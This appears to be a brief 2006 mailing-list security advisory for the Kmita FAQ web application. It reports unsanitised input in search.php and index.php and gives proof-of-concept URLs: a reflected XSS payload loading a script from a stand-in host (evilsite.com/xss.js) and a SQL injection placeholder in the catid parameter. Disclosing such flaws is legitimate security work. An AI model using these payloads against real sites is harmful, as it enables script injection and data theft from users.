Kmita FAQ v1.0

Mon, 05 Jun 2006 11:55:54 -0700 

Kmita FAQ v1.0


Homepage:

http://www.kmita-faq.com


Effected files:

search.php

index.php


Search.php does not sanatize user input before dynamically genrating it.

Proof of concept:


http://www.example.com/search.php?q=<SCRIPT%20SRC=http://evilsite.com/xss.js></SCRIPT>


SQL Injection proof of concept:

http://www.example.com/index.php?catid=[SQL]

Reply via email to